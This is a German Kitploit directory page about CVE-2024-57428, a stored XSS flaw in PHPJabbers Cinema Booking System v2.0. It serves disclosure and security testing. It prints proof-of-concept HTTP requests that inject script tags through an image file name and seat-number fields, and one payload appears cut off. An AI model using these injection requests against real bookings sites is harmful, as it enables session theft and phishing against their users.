Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-57428 — CVE-2024-57428: Das PHPJabbers Cinema Booking System v2.0 leidet unter Stored XSS, wodurch persistente JavaScript-Injektionen für Phishing- und Malware-Angriffe möglich sind. | Kitploit
Tools/GitHubGitHub/ahrixia/cve-2024-57428
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPhishingPenetrationstests
GitHubahrixia/cve-2024-57428

CVE-2024-57428

CVE-2024-57428: Das PHPJabbers Cinema Booking System v2.0 leidet unter Stored XSS, wodurch persistente JavaScript-Injektionen für Phishing- und Malware-Angriffe möglich sind.

Repository anzeigen
46vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-57428

Im PHPJabbers Cinema Booking System v2.0 besteht eine Schwachstelle für gespeichertes Cross-Site-Scripting (XSS), die auf nicht bereinigte Eingaben in den Datei-Upload-Feldern (event_img, seat_maps) und den Sitzplatzkonfigurationen (number[new_X] in pjActionCreate) zurückzuführen ist. Angreifer können dauerhaftes JavaScript injizieren, was zu Phishing, Malware-Injektion und Session-Hijacking führt.

Verwundbarer Parameter: event_img und seat_maps's file name

Auswirkungen:

Gespeichertes XSS ist schwerwiegender als reflektiertes XSS, da es alle Benutzer betrifft, die auf den injizierten Inhalt zugreifen. Es könnte für dauerhafte Phishing-Angriffe, Session-Diebstahl oder das Einschleusen von Malware in eine große Benutzerbasis ausgenutzt werden.

Exploit - Proof of Concept (POC)

Gespeichertes Cross-Site-Scripting (XSS)

Gespeichertes XSS beim Datei-Upload

Payload: \">

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]


------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg

SITZPLATZNUMMER IM KINOSAAL

Payload: "><script>alert(x)</script>

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]


------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"

11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"

1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"

2"><script>alert(2)</script>2
Tool herunterladen